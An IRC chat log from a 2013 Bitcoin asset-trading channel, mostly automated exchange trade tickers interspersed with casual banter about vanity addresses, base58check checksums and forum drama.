Jun 17 03:17:19 [BTCTC] [DMS.MINING] 5 @ 0.026812 = 0.1341 BTC [-] Jun 17 03:17:22 [BTCTC] [DMS.MINING] 43 @ 0.026505 = 1.1397 BTC [-] Jun 17 03:17:54 [BTCTC] [DMS.PURCHASE] 50 @ 0.066149 = 3.3075 BTC [+] Jun 17 03:18:19 [BTCTC] [DMS.PURCHASE] 10 @ 0.066149 = 0.6615 BTC [+] Jun 17 03:20:53 [BTCTC] [DMS.PURCHASE] 160 @ 0.066149 = 10.5838 BTC [+] Jun 17 03:24:47 [BTCTC] [DMS.MINING] 7 @ 0.026505 = 0.1855 BTC [-] Jun 17 03:24:49 [BTCTC] [DMS.MINING] 53 @ 0.026502 = 1.4046 BTC [-] Jun 17 03:25:20 [BTCTC] [DMS.PURCHASE] 25 @ 0.066149 = 1.6537 BTC [+] Jun 17 03:26:26 [BTCTC] [TAT.VIRTUALMINE] 23 @ 0.00684 = 0.1573 BTC [+] Jun 17 03:26:29 [BTCTC] [DMS.MINING] 47 @ 0.026502 = 1.2456 BTC [-] Jun 17 03:26:54 [BTCTC] [DMS.MINING] 35 @ 0.026301 = 0.9205 BTC [-] Jun 17 03:27:34 [BTCTC] [DMS.MINING] 40 @ 0.026301 = 1.052 BTC [-] Jun 17 03:28:11 [BTCTC] [DMS.MINING] 15 @ 0.026301 = 0.3945 BTC [-] Jun 17 03:28:13 [BTCTC] [DMS.MINING] 63 @ 0.0263 = 1.6569 BTC [-] Jun 17 03:29:00 [BTCTC] [DMS.PURCHASE] 65 @ 0.066149 = 4.2997 BTC [+] Jun 17 03:29:39 [MPEX] [S.MPOE] 8633 @ 0.00070362 = 6.0744 BTC [-] Jun 17 03:29:41 [MPEX] [S.MPOE] 3300 @ 0.00070572 = 2.3289 BTC [+] Jun 17 03:29:51 [MPEX] [S.MPOE] 2089 @ 0.00070634 = 1.4755 BTC [+] Jun 17 03:29:52 [MPEX] [S.MPOE] 4321 @ 0.00070691 = 3.0546 BTC [+] Jun 17 03:29:54 [MPEX] [S.MPOE] 8707 @ 0.00070692 = 6.1552 BTC [+] Jun 17 03:34:21 [BTCTC] [DMS.MINING] 25 @ 0.0263 = 0.6575 BTC [-] Jun 17 03:34:51 [BTCTC] [DMS.PURCHASE] 11 @ 0.066149 = 0.7276 BTC [+] Jun 17 03:37:43 [BTCTC] [DMS.MINING] 11 @ 0.0263 = 0.2893 BTC [-] Jun 17 03:46:16 [BTCTC] [B.YABMC] 1 @ 0.01524 BTC [+] Jun 17 03:46:18 [BTCTC] [B.YABMC] 44 @ 0.015249 = 0.671 BTC [+] Jun 17 03:52:25 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.00681 = 0.0272 BTC [-] Jun 17 04:00:34 [MPEX] [S.MPOE] 3900 @ 0.00070859 = 2.7635 BTC [+] Jun 17 04:04:26 [MPEX] [S.MPOE] 650 @ 0.00070859 = 0.4606 BTC [+] Jun 17 04:09:27 [MPEX] [S.MPOE] 5739 @ 0.00070721 = 4.0587 BTC [-] Jun 17 04:09:29 [MPEX] [S.MPOE] 4321 @ 0.00070328 = 3.0389 BTC [-] Jun 17 04:09:30 [MPEX] [S.MPOE] 8200 @ 0.00070327 = 5.7668 BTC [-] Jun 17 04:19:53 [BTCTC] [TAT.ASICMINER] 12 @ 0.028967 = 0.3476 BTC [-] Jun 17 04:25:02 [MPEX] [S.MPOE] 3300 @ 0.00070025 = 2.3108 BTC [-] Jun 17 04:25:06 [MPEX] [S.MPOE] 2308 @ 0.00069971 = 1.6149 BTC [-] Jun 17 04:28:28 anyone got some PP change? Jun 17 04:34:28 [MPEX] [S.MPOE] 4000 @ 0.00069551 = 2.782 BTC [-] Jun 17 04:34:30 [MPEX] [S.MPOE] 2450 @ 0.0006955 = 1.704 BTC [-] Jun 17 04:35:28 [BTCTC] [S.DICE-PT] 92 @ 0.002639 = 0.2428 BTC [+] Jun 17 04:47:37 [HAVELOCK] [ASICM] 4 @ 0.02879999 = 0.1152 BTC [+] Jun 17 04:49:58 [BTCTC] [BTC-TRADING-PT] 9 @ 0.3563 = 3.2067 BTC [+] Jun 17 04:52:41 [BTCTC] [B.YABMC] 80 @ 0.014789 = 1.1831 BTC [-] Jun 17 04:52:45 [BTCTC] [B.YABMC] 4 @ 0.01479 = 0.0592 BTC [+] Jun 17 04:52:47 [BTCTC] [B.YABMC] 6 @ 0.014796 = 0.0888 BTC [+] Jun 17 04:53:15 [BTCTC] [S.DICE-PT] 92 @ 0.002462 = 0.2265 BTC [-] Jun 17 04:53:17 [BTCTC] [S.DICE-PT] 80 @ 0.002461 = 0.1969 BTC [-] Jun 17 04:53:22 [BTCTC] [S.DICE-PT] 10 @ 0.002459 = 0.0246 BTC [-] Jun 17 04:53:28 [BTCTC] [S.DICE-PT] 37 @ 0.002456 = 0.0909 BTC [-] Jun 17 04:53:30 [BTCTC] [S.DICE-PT] 100 @ 0.002456 = 0.2456 BTC [-] Jun 17 04:53:35 [BTCTC] [S.DICE-PT] 99 @ 0.002455 = 0.243 BTC [-] Jun 17 04:53:37 [BTCTC] [S.DICE-PT] 133 @ 0.002452 = 0.3261 BTC [-] Jun 17 04:53:42 [BTCTC] [S.DICE-PT] 100 @ 0.00245 = 0.245 BTC [-] Jun 17 04:53:45 [BTCTC] [S.DICE-PT] 4 @ 0.00245 = 0.0098 BTC [-] Jun 17 04:53:48 [BTCTC] [S.DICE-PT] 100 @ 0.00242 = 0.242 BTC [-] Jun 17 04:53:52 [BTCTC] [S.DICE-PT] 65 @ 0.002415 = 0.157 BTC [-] Jun 17 04:53:53 [BTCTC] [S.DICE-PT] 300 @ 0.00241 = 0.723 BTC [-] Jun 17 04:54:00 [BTCTC] [S.DICE-PT] 200 @ 0.002405 = 0.481 BTC [-] Jun 17 04:54:03 [BTCTC] [S.DICE-PT] 50 @ 0.002403 = 0.1202 BTC [-] Jun 17 04:54:05 [BTCTC] [S.DICE-PT] 250 @ 0.002402 = 0.6005 BTC [-] Jun 17 04:54:07 [BTCTC] [S.DICE-PT] 1 @ 0.0024 BTC [-] Jun 17 04:54:11 [BTCTC] [S.DICE-PT] 1 @ 0.0024 BTC [-] Jun 17 04:54:13 [BTCTC] [S.DICE-PT] 50 @ 0.0024 = 0.12 BTC [-] Jun 17 04:54:14 [BTCTC] [S.DICE-PT] 7 @ 0.0024 = 0.0168 BTC [-] Jun 17 04:54:16 [BTCTC] [S.DICE-PT] 750 @ 0.0024 = 1.8 BTC [-] Jun 17 05:00:18 [HAVELOCK] [ASICM] 1 @ 0.0288 BTC [+] Jun 17 05:08:51 [BTCTC] [DMS.MINING] 50 @ 0.026301 = 1.3151 BTC [+] Jun 17 05:08:53 [BTCTC] [DMS.MINING] 15 @ 0.0263 = 0.3945 BTC [-] Jun 17 05:09:35 [MPEX] [S.MPOE] 7550 @ 0.0006955 = 5.251 BTC [-] Jun 17 05:09:37 [MPEX] [S.MPOE] 10000 @ 0.00069501 = 6.9501 BTC [-] Jun 17 05:09:41 [MPEX] [S.MPOE] 11550 @ 0.000695 = 8.0273 BTC [-] Jun 17 05:14:24 [BTCTC] [ASICMINER-PT] 1 @ 2.82 BTC [+] Jun 17 05:14:42 [BTCTC] [DMS.PURCHASE] 25 @ 0.066149 = 1.6537 BTC [+] Jun 17 05:19:09 [BTCTC] [S.MPOE-PT] 1 @ 0.000703 BTC [+] **** BEGIN LOGGING AT Mon Jun 17 14:36:25 2013 Jun 17 14:41:04 [MPEX] [S.MPOE] 3754 @ 0.000685 = 2.5715 BTC [-] Jun 17 14:47:40 [BTCTC] [CRYPTO-TRADE] 1 @ 0.183897 BTC [+] Jun 17 14:47:46 [BTCTC] [CRYPTO-TRADE] 1 @ 0.189976 BTC [+] Jun 17 14:48:33 [MPEX] [S.MPOE] 17685 @ 0.00068481 = 12.1109 BTC [-] Jun 17 14:54:27 [BTCTC] [DMS.SELLING] 3 @ 0.045998 = 0.138 BTC [+] Jun 17 14:55:00 [BTCTC] [ASICMINER-PT] 1 @ 2.85 BTC [-] Jun 17 14:55:39 ;;seen Bugpowder Jun 17 14:55:39 Bugpowder was last seen in #bitcoin-assets 2 weeks, 5 days, 16 hours, 17 minutes, and 4 seconds ago: all the 3 letter ones are gone Jun 17 14:56:15 he doesn't seem to hang here much anymore Jun 17 14:57:06 iirc he took the red pill Jun 17 14:57:15 or w/e the bad pill is. went into research or w/e dead end. Jun 17 14:57:32 [BTCTC] [TAT.ASICMINER] 32 @ 0.0288 = 0.9216 BTC [+] Jun 17 14:57:34 [BTCTC] [TAT.ASICMINER] 2 @ 0.028774 = 0.0575 BTC [-] Jun 17 14:57:50 [BTCTC] [ASICMINER-PT] 1 @ 2.85 BTC [-] Jun 17 14:58:40 yeah i think he got some of his funding for his lab and maybe now only dabbles in BTC/USD Jun 17 14:59:06 he did pop up on the forums recently to yell at at Erik Jun 17 14:59:06 it makes sense, right ? you make in six months while having fun more than you've made in your entire life of druggery Jun 17 14:59:13 so you go do bigger druggery wiff the loot. Jun 17 14:59:47 [HAVELOCK] [ASICM] 17 @ 0.02915 = 0.4956 BTC [+] Jun 17 15:00:39 er, um...you mean druDgery? Jun 17 15:01:06 yea Jun 17 15:01:17 maybe he'll cure cancer Jun 17 15:01:24 righty. Jun 17 15:01:27 :) Jun 17 15:01:41 [HAVELOCK] [ASICM] 100 @ 0.02915 = 2.915 BTC [+] Jun 17 15:02:02 maybe bitcoin will be 1 mn per and maybe he'll cure cancer are different sorts of maybes Jun 17 15:02:15 [HAVELOCK] [ASICM] 83 @ 0.02915 = 2.4195 BTC [+] Jun 17 15:02:18 like maybe i'll get laid this week and maybe amir will are diff sorts of maybes. Jun 17 15:02:56 [BTCTC] [LTC-MINING] 1 @ 0.39892 BTC [-] Jun 17 15:03:19 [HAVELOCK] [ASICM] 200 @ 0.02916 = 5.832 BTC [+] Jun 17 15:03:54 [HAVELOCK] [ASICM] 156 @ 0.02918999 = 4.5536 BTC [+] Jun 17 15:05:02 https://bitcointalk.org/index.php?topic=236309.0 Jun 17 15:05:04 teh trolling continues Jun 17 15:06:58 [BTCTC] [ASICMINER-PT] 2 @ 2.85 = 5.7 BTC [-] Jun 17 15:08:13 mp, you owe me 100btc that you agreed to pay me, I can't find the agreement, but my friend pm'd me reminding me that you owe Jun 17 15:08:28 do the right thing plz Jun 17 15:08:59 or I will sick the rota on you Jun 17 15:10:11 my address has a decent sense of humor Jun 17 15:10:41 send to BFL's foundation Jun 17 15:10:52 or directly to Luke-JR if you wanna save time Jun 17 15:11:54 [BTCTC] [TAT.VIRTUALMINE] 16 @ 0.006899 = 0.1104 BTC [+] Jun 17 15:12:35 no one like mpex getting money right? send it there Jun 17 15:13:05 send it incorrectly though, so it gets confiscated Jun 17 15:13:20 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.0069 = 0.345 BTC [+] Jun 17 15:13:22 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.0069 = 0.345 BTC [+] Jun 17 15:13:45 what does he hate? Jun 17 15:13:51 yeah that would help Jun 17 15:14:02 send it to the forum then Jun 17 15:14:04 for new software Jun 17 15:14:07 1RippleXXXX would be funny Jun 17 15:14:41 send it to the forum and get Matt a nice Donor tag Jun 17 15:14:46 to go with his scamme rone Jun 17 15:15:07 1TheymosForumSoftwareFund Jun 17 15:15:26 of course you wouldnt be able to spend it Jun 17 15:18:12 maybe you can pay off theymos to permachange his avatar to something funny Jun 17 15:18:33 any address of the right size and starting witha 1 is valid Jun 17 15:18:40 nope Jun 17 15:18:40 ThickAsThieves: nop Jun 17 15:18:44 theres a checksum Jun 17 15:18:46 it would just take forever to mine the vanity addy Jun 17 15:19:44 scrat are we saying the same thing, in that you mean any address with a 1 *could* exist? Jun 17 15:19:52 (i'm not well-versed in this stuff) Jun 17 15:20:20 Chaang-Noi: I can Jun 17 15:20:31 goat, here: https://bitcointalk.org/index.php?topic=1026.0 Jun 17 15:20:51 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19494 BTC [+] Jun 17 15:20:55 if you read the code, it does compute the checksum you need Jun 17 15:21:11 you can pay me, np Jun 17 15:22:31 sup mjr_ you there? Jun 17 15:25:10 interesting, capital i is not allowed in btc addy? Jun 17 15:25:24 nor is lowercase L Jun 17 15:26:17 [MPEX] [S.MPOE] 12200 @ 0.00068155 = 8.3149 BTC [-] Jun 17 15:26:51 so that it isn't confused with 1 when typing by hand Jun 17 15:27:16 big O isn't allowed, too Jun 17 15:29:03 [BTCTC] [ASICMINER-PT] 1 @ 2.850001 BTC [+] Jun 17 15:36:01 Chaang-Noi: what do you say to 1MatthewNWrightisaScammer124DNsfX ? Jun 17 15:37:11 damn you jurov Jun 17 15:37:15 Chaang-Noi: ill send it back, gimme address Jun 17 15:37:31 moment, it seems broken Jun 17 15:39:33 yes, maybe i had some dirt in clipboard Jun 17 15:39:38 my addy: 1EteoRKNYbNhhmFfsKnUSWRF3JUpKCcMnc Jun 17 15:39:46 I was at the last step of base58check but jurov has faster fingers >:-Q Jun 17 15:40:15 i just hacked get_bcaddress_version a bit :) Jun 17 15:40:27 jurov: sent you his 0.5 Jun 17 15:40:42 thanks :) Jun 17 15:42:46 [BTCTC] [TAT.ASICMINER] 11 @ 0.0289 = 0.3179 BTC [+] Jun 17 15:44:20 [MPEX] [S.MPOE] 15000 @ 0.00068155 = 10.2233 BTC [-] Jun 17 15:44:43 [MPEX] [S.MPOE] 2500 @ 0.00068155 = 1.7039 BTC [-] Jun 17 15:45:44 [HAVELOCK] [ASICM] 200 @ 0.02918 = 5.836 BTC [-] Jun 17 15:46:54 [HAVELOCK] [ASICM] 121 @ 0.02918999 = 3.532 BTC [+] Jun 17 15:47:29 [HAVELOCK] [ASICM] 570 @ 0.02919 = 16.6383 BTC [+] Jun 17 15:48:50 [HAVELOCK] [ASICM] 12 @ 0.02919 = 0.3503 BTC [+] Jun 17 15:49:19 [HAVELOCK] [ASICM] 11 @ 0.0291 = 0.3201 BTC [-] Jun 17 15:49:36 [BTCTC] [TAT.ASICMINER] 11 @ 0.0289 = 0.3179 BTC [+] Jun 17 15:49:45 [BTCTC] [DMS.MINING] 3 @ 0.027 = 0.081 BTC [+] Jun 17 15:49:50 [HAVELOCK] [ASICM] 420 @ 0.0292 = 12.264 BTC [+] Jun 17 15:50:27 [BTCTC] [ASICMINER-PT] 2 @ 2.85 = 5.7 BTC [-] Jun 17 15:51:42 [BTCTC] [DMS.PURCHASE] 80 @ 0.066149 = 5.2919 BTC [+] Jun 17 15:54:18 [BTCTC] [DMS.MINING] 1 @ 0.0266 BTC [-] Jun 17 15:54:20 [BTCTC] [DMS.MINING] 5 @ 0.0265 = 0.1325 BTC [-] Jun 17 15:54:24 [BTCTC] [DMS.MINING] 2 @ 0.0255 = 0.051 BTC [-] Jun 17 15:54:26 [BTCTC] [DMS.MINING] 11 @ 0.0255 = 0.2805 BTC [-] Jun 17 16:00:53 [BTCTC] [LTC-MINING] 1 @ 0.39892 BTC [-] Jun 17 16:06:07 [BTCTC] [TAT.ASICMINER] 10 @ 0.0289 = 0.289 BTC [+] Jun 17 16:07:21 [BTCTC] [B.YABMC] 1 @ 0.0143 BTC [+] Jun 17 16:11:12 [MPEX] [S.MPOE] 900 @ 0.00068155 = 0.6134 BTC [-] Jun 17 16:11:14 [MPEX] [S.MPOE] 4965 @ 0.00068286 = 3.3904 BTC [+] Jun 17 16:12:58 [MPEX] [S.MPOE] 14635 @ 0.00068368 = 10.0057 BTC [+] Jun 17 16:13:00 [MPEX] [S.MPOE] 10000 @ 0.00068 = 6.8 BTC [-] Jun 17 16:16:54 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00689 = 0.0138 BTC [-] Jun 17 16:19:08 [BTCTC] [TAT.VIRTUALMINE] 8 @ 0.00689 = 0.0551 BTC [-] Jun 17 16:20:17 [BTCTC] [TAT.VIRTUALMINE] 117 @ 0.0069 = 0.8073 BTC [+] Jun 17 16:20:19 [BTCTC] [TAT.VIRTUALMINE] 41 @ 0.0069 = 0.2829 BTC [+] Jun 17 16:21:06 [BTCTC] [TAT.ASICMINER] 50 @ 0.028403 = 1.4202 BTC [-] Jun 17 16:21:08 [BTCTC] [TAT.ASICMINER] 10 @ 0.028403 = 0.284 BTC [-] Jun 17 16:21:18 [MPEX] [S.MPOE] 15000 @ 0.00067 = 10.05 BTC [-] Jun 17 16:22:01 [BTCTC] [TAT.ASICMINER] 8 @ 0.028402 = 0.2272 BTC [-] Jun 17 16:22:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.0284 BTC [-] Jun 17 16:22:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.028311 BTC [-] Jun 17 16:22:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.02831 BTC [-] Jun 17 16:22:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.0283 BTC [-] Jun 17 16:22:26 [BTCTC] [TAT.ASICMINER] 3 @ 0.0283 = 0.0849 BTC [-] Jun 17 16:23:16 [BTCTC] [TAT.VIRTUALMINE] 85 @ 0.0069 = 0.5865 BTC [+] Jun 17 16:24:14 [BTCTC] [TAT.VIRTUALMINE] 33 @ 0.00698 = 0.2303 BTC [+] Jun 17 16:24:16 [BTCTC] [TAT.VIRTUALMINE] 188 @ 0.00698 = 1.3122 BTC [+] Jun 17 16:25:19 [BTCTC] [TAT.ASICMINER] 15 @ 0.0283 = 0.4245 BTC [-] Jun 17 16:25:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.028222 BTC [-] Jun 17 16:25:25 [BTCTC] [TAT.ASICMINER] 28 @ 0.028215 = 0.79 BTC [-] Jun 17 16:25:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.028214 BTC [-] Jun 17 16:25:28 [BTCTC] [TAT.ASICMINER] 3 @ 0.028214 = 0.0846 BTC [-] Jun 17 16:25:30 [BTCTC] [TAT.ASICMINER] 7 @ 0.028212 = 0.1975 BTC [-] Jun 17 16:25:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.028211 BTC [-] Jun 17 16:25:33 [BTCTC] [TAT.ASICMINER] 30 @ 0.028001 = 0.84 BTC [-] Jun 17 16:25:35 [BTCTC] [TAT.ASICMINER] 4 @ 0.028 = 0.112 BTC [-] Jun 17 16:25:37 [BTCTC] [TAT.ASICMINER] 5 @ 0.028 = 0.14 BTC [-] Jun 17 16:25:39 [HAVELOCK] [ASICM] 2 @ 0.0291999 = 0.0584 BTC [-] Jun 17 16:25:40 [HAVELOCK] [ASICM] 4 @ 0.0292 = 0.1168 BTC [+] Jun 17 16:25:41 [BTCTC] [TAT.ASICMINER] 6 @ 0.028 = 0.168 BTC [-] Jun 17 16:25:43 [BTCTC] [TAT.ASICMINER] 3 @ 0.028 = 0.084 BTC [-] Jun 17 16:30:24 [BTCTC] [RSM] 19 @ 0.0176 = 0.3344 BTC [+] Jun 17 16:30:26 [BTCTC] [RSM] 1 @ 0.0177 BTC [+] Jun 17 16:30:30 [BTCTC] [RSM] 113 @ 0.0179 = 2.0227 BTC [+] Jun 17 16:31:50 [BTCTC] [ASICMINER-PT] 3 @ 2.85 = 8.55 BTC [-] Jun 17 16:33:23 [BTCTC] [DMS.SELLING] 20 @ 0.045 = 0.9 BTC [-] Jun 17 16:33:27 [BTCTC] [DMS.SELLING] 22 @ 0.045998 = 1.012 BTC [+] Jun 17 16:33:29 [BTCTC] [DMS.SELLING] 27 @ 0.045999 = 1.242 BTC [+] Jun 17 16:33:32 [BTCTC] [DMS.SELLING] 431 @ 0.046 = 19.826 BTC [+] Jun 17 16:34:19 [BTCTC] [DMS.SELLING] 4 @ 0.046 = 0.184 BTC [+] Jun 17 16:35:08 [BTCTC] [DMS.PURCHASE] 500 @ 0.066149 = 33.0745 BTC [+] Jun 17 16:35:14 [BTCTC] [TAT.ASICMINER] 2 @ 0.028986 = 0.058 BTC [+] Jun 17 16:38:12 [BTCTC] [DMS.MINING] 23 @ 0.02551 = 0.5867 BTC [+] Jun 17 16:38:24 [BTCTC] [DMS.MINING] 7 @ 0.0255 = 0.1785 BTC [-] Jun 17 16:41:41 [BTCTC] [DMS.MINING] 42 @ 0.0255 = 1.071 BTC [-] Jun 17 16:41:44 [BTCTC] [DMS.MINING] 3 @ 0.0254 = 0.0762 BTC [-] Jun 17 16:41:46 [BTCTC] [DMS.MINING] 8 @ 0.0254 = 0.2032 BTC [-] Jun 17 16:41:49 [BTCTC] [DMS.MINING] 4 @ 0.0253 = 0.1012 BTC [-] Jun 17 16:41:51 [BTCTC] [DMS.MINING] 2 @ 0.0253 = 0.0506 BTC [-] Jun 17 16:41:53 [BTCTC] [DMS.MINING] 100 @ 0.0253 = 2.53 BTC [-] Jun 17 16:41:54 [BTCTC] [DMS.PURCHASE] 1 @ 0.066149 BTC [+] Jun 17 16:41:58 [BTCTC] [DMS.MINING] 83 @ 0.025201 = 2.0917 BTC [-] Jun 17 16:42:04 [BTCTC] [DMS.MINING] 7 @ 0.025201 = 0.1764 BTC [-] Jun 17 16:43:06 [BTCTC] [DMS.PURCHASE] 150 @ 0.066149 = 9.9224 BTC [+] Jun 17 16:51:09 [BTCTC] [DMS.PURCHASE] 50 @ 0.066149 = 3.3075 BTC [+] Jun 17 16:57:52 [BTCTC] [DMS.MINING] 20 @ 0.025996 = 0.5199 BTC [+] Jun 17 16:59:27 [HAVELOCK] [ASICM] 1 @ 0.02901 BTC [-] Jun 17 16:59:35 [HAVELOCK] [ASICM] 4 @ 0.02900001 = 0.116 BTC [-] Jun 17 16:59:40 [HAVELOCK] [ASICM] 7 @ 0.029 = 0.203 BTC [-] Jun 17 16:59:50 [HAVELOCK] [ASICM] 1 @ 0.0289 BTC [-] Jun 17 17:00:12 [HAVELOCK] [ASICM] 1 @ 0.0288501 BTC [-] Jun 17 17:00:18 [HAVELOCK] [ASICM] 1 @ 0.0286 BTC [-] Jun 17 17:07:26 alright jurov Jun 17 17:07:41 this is where I pay you all the bitcoins I have on hand to help me Jun 17 17:07:48 with this CSS stuffs Jun 17 17:08:50 OR NOT Jun 17 17:08:53 ;;seen mircea_popescu Jun 17 17:08:54 mircea_popescu was last seen in #bitcoin-assets 2 hours, 3 minutes, and 48 seconds ago: teh trolling continues Jun 17 17:11:16 http://youtu.be/tQP6_anWnec?t=1m13s Jun 17 17:11:20 ya'll see that Jun 17 17:11:41 too many usbs Jun 17 17:11:48 [MPEX] [S.MPOE] 2600 @ 0.00066208 = 1.7214 BTC [-] Jun 17 17:11:52 [MPEX] [S.MPOE] 6400 @ 0.00066247 = 4.2398 BTC [+] Jun 17 17:17:26 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.006722 = 0.3361 BTC [-] Jun 17 17:17:56 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.006721 = 0.0672 BTC [-] Jun 17 17:18:02 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00668 BTC [-] Jun 17 17:18:03 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00604 BTC [-] Jun 17 17:18:05 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00603 BTC [-] Jun 17 17:18:06 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.006 = 0.6 BTC [-] Jun 17 17:18:08 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.006 = 0.6 BTC [-] Jun 17 17:20:20 [BTCTC] [DMS.MINING] 17 @ 0.025799 = 0.4386 BTC [-] Jun 17 17:20:20 [BTCTC] [DMS.MINING] 2 @ 0.0258 = 0.0516 BTC [+] Jun 17 17:20:22 [BTCTC] [DMS.MINING] 14 @ 0.025997 = 0.364 BTC [+] Jun 17 17:20:23 [BTCTC] [DMS.MINING] 67 @ 0.025999 = 1.7419 BTC [+] Jun 17 17:21:03 [BTCTC] [DMS.MINING] 17 @ 0.023521 = 0.3999 BTC [-] Jun 17 17:21:05 [BTCTC] [DMS.MINING] 100 @ 0.02352 = 2.352 BTC [-] Jun 17 17:21:19 [HAVELOCK] [ASICM] 40 @ 0.0285301 = 1.1412 BTC [-] Jun 17 17:27:10 [HAVELOCK] [ASICM] 4 @ 0.02919999 = 0.1168 BTC [+] Jun 17 17:27:12 [HAVELOCK] [ASICM] 26 @ 0.0292 = 0.7592 BTC [+] Jun 17 17:27:13 [HAVELOCK] [ASICM] 500 @ 0.0292 = 14.6 BTC [+] Jun 17 17:27:14 [HAVELOCK] [ASICM] 1030 @ 0.02925 = 30.1275 BTC [+] Jun 17 17:27:15 [HAVELOCK] [ASICM] 3 @ 0.029255 = 0.0878 BTC [+] Jun 17 17:27:16 [HAVELOCK] [ASICM] 92 @ 0.02979997 = 2.7416 BTC [+] Jun 17 17:27:16 [HAVELOCK] [ASICM] 345 @ 0.0298 = 10.281 BTC [+] Jun 17 17:27:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.028977 BTC [-] Jun 17 17:28:40 [MPEX] [S.MPOE] 18887 @ 0.00065979 = 12.4615 BTC [-] Jun 17 17:28:58 [BTCTC] [DMS.MINING] 33 @ 0.025998 = 0.8579 BTC [+] Jun 17 17:29:00 [BTCTC] [DMS.MINING] 23 @ 0.025999 = 0.598 BTC [+] Jun 17 17:29:01 [BTCTC] [DMS.MINING] 44 @ 0.026 = 1.144 BTC [+] Jun 17 17:31:25 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.006499 = 0.325 BTC [+] Jun 17 17:31:27 [BTCTC] [TAT.VIRTUALMINE] 13 @ 0.006898 = 0.0897 BTC [+] Jun 17 17:32:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.028977 BTC [-] Jun 17 17:32:43 [HAVELOCK] [SDICE] 1 @ 0.224 BTC [-] Jun 17 17:32:44 [HAVELOCK] [SDICE] 5 @ 0.2241 = 1.1205 BTC [+] Jun 17 17:32:45 [HAVELOCK] [SDICE] 8 @ 0.2245 = 1.796 BTC [+] Jun 17 17:32:46 [HAVELOCK] [SDICE] 1 @ 0.228001 BTC [+] Jun 17 17:32:47 [HAVELOCK] [SDICE] 12 @ 0.229 = 2.748 BTC [+] Jun 17 17:32:48 [HAVELOCK] [SDICE] 20 @ 0.2299999 = 4.6 BTC [+] Jun 17 17:32:49 [HAVELOCK] [SDICE] 28 @ 0.22999999 = 6.44 BTC [+] Jun 17 17:33:06 [BTCTC] [DMS.SELLING] 19 @ 0.0455 = 0.8645 BTC [-] Jun 17 17:34:00 [HAVELOCK] [SDICE] 6 @ 0.22999999 = 1.38 BTC [+] Jun 17 17:34:01 [HAVELOCK] [SDICE] 17 @ 0.23 = 3.91 BTC [+] Jun 17 17:34:02 [HAVELOCK] [SDICE] 1 @ 0.23 BTC [+] Jun 17 17:34:26 [HAVELOCK] [SDICE] 1 @ 0.23 BTC [+] Jun 17 17:34:52 [HAVELOCK] [SDICE] 1 @ 0.22999999 BTC [-] Jun 17 17:36:11 [MPEX] [S.MPOE] 21400 @ 0.0006575 = 14.0705 BTC [-] Jun 17 17:37:30 [HAVELOCK] [ASICM] 500 @ 0.0295 = 14.75 BTC [-] Jun 17 17:39:02 [HAVELOCK] [SDICE] 8 @ 0.239 = 1.912 BTC [+] Jun 17 17:39:03 [HAVELOCK] [SDICE] 20 @ 0.24 = 4.8 BTC [+] Jun 17 17:39:04 [HAVELOCK] [SDICE] 9 @ 0.248 = 2.232 BTC [+] Jun 17 17:39:06 [HAVELOCK] [SDICE] 20 @ 0.2487 = 4.974 BTC [+] Jun 17 17:39:07 [HAVELOCK] [SDICE] 92 @ 0.249 = 22.908 BTC [+] Jun 17 17:39:21 [MPEX] [S.MPOE] 8711 @ 0.00065911 = 5.7415 BTC [+] Jun 17 17:40:41 [MPEX] [S.MPOE] 21867 @ 0.00066211 = 14.4784 BTC [+] Jun 17 17:47:31 [BTCTC] [DMS.PURCHASE] 20 @ 0.066149 = 1.323 BTC [+] Jun 17 17:47:49 ;;tslb Jun 17 17:47:52 Time since last block: 15 minutes and 36 seconds Jun 17 17:47:57 ;;bc,stats Jun 17 17:47:59 Current Blocks: 242021 | Current Difficulty: 1.933925827238668E7 | Next Difficulty At Block: 243935 | Next Difficulty In: 1914 blocks | Next Difficulty In About: 1 week, 5 days, 18 hours, 14 minutes, and 24 seconds | Next Difficulty Estimate: 19440473.3377 | Estimated Percent Change: 0.52337 Jun 17 17:48:05 ;;nethash Jun 17 17:48:05 145323.263317 Jun 17 17:50:54 [HAVELOCK] [SDICE] 2 @ 0.248 = 0.496 BTC [-] Jun 17 17:56:17 [BTCTC] [ASICMINER-PT] 1 @ 2.83 BTC [-] Jun 17 17:57:30 [BTCTC] [TAT.ASICMINER] 48 @ 0.028977 = 1.3909 BTC [-] Jun 17 17:57:31 [BTCTC] [TAT.ASICMINER] 3 @ 0.028978 = 0.0869 BTC [+] Jun 17 17:57:33 [BTCTC] [TAT.ASICMINER] 10 @ 0.028979 = 0.2898 BTC [+] Jun 17 17:57:34 [BTCTC] [TAT.ASICMINER] 10 @ 0.02898 = 0.2898 BTC [+] Jun 17 18:02:35 [BTCTC] [TAT.ASICMINER] 2 @ 0.028986 = 0.058 BTC [+] Jun 17 18:04:02 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.006898 BTC [+] Jun 17 18:09:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.028986 BTC [+] Jun 17 18:15:08 thestringpuller wha? Jun 17 18:19:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.028986 BTC [+] Jun 17 18:22:34 [BTCTC] [DMS.MINING] 37 @ 0.026 = 0.962 BTC [+] Jun 17 18:23:34 [BTCTC] [ASICMINER-PT] 1 @ 2.8599 BTC [+] Jun 17 18:23:48 [BTCTC] [TAT.ASICMINER] 16 @ 0.028986 = 0.4638 BTC [+] Jun 17 18:23:50 [BTCTC] [TAT.ASICMINER] 10 @ 0.028986 = 0.2899 